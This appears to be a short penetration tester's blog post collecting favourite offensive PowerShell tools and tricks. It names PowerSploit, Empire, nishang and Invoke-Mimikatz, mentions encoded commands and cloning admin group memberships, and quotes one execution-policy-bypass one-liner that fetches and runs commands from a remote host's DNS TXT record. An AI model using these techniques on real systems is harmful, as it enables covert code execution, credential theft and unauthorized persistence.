I’m never quite sure how to start these off, but I figure we start with a personal and possibly sacrilegious anecdote. There was a time when I hated PowerShell.
You can go ahead and crucify me now; however, I just had a really hard time finding value in it. I think that this changed when I saw how truly powerful PowerShell was while providing little additional value to security. There are so many awesome people doing amazing and mysterious things with PowerShell. I’m hoping I can compile my “Greatest Hits” collection here.
- PowerSploit - A great collection of offensive PowerShell scripts.
- Empire - Think Metasploit, but in PowerShell. This framework has integrated itself into my pentesting toolkit and I don’t think I will ever drop it.
- NPS aka. Not PowerShell - This is an executable that functions… well… like PowerShell.
- nishang - Another collection of offensive PowerShell scripts.
- Metasploit even has PowerShell payloads.
I’m standing on the shoulders of giants here and I really think people should be focusing on these folks:
- harmj0y - Everything harmj0y touches is gold.
- Tim Medin
- Vincent Yiu - Vincent has made some great tweets that really spawned this whole blog post.
We might want to import functions directly into memory. Invoke-Mimkatz, for example.
I think a lot of folks like running encoded PowerShell commands. Here’s how I generate the Base64 encoded commands:
Vincent Yiu shared a really interesting alternative to IEX.
Imagine a world where you can execute commands stored in DNS TXT records…
No need for IEX cc @MDSecLabs : powershell -ep bypass -nop -c “powershell . ((nslookup.exe -q=txt http://calc.vincentyiu.co.uk ))”
I wanted to store Base64 encoded commands in a DNS TXT record, but there’s a unfortunately a character limit of 255 chracters.
So, I split them up across multiple and here’s my first attempt…
Clone the group memberships from an existing administrative account to a new (or existing) account.
I am totally aware that this is an incomplete list with nothing too special on it. Do not despair - I will add things as I learn them.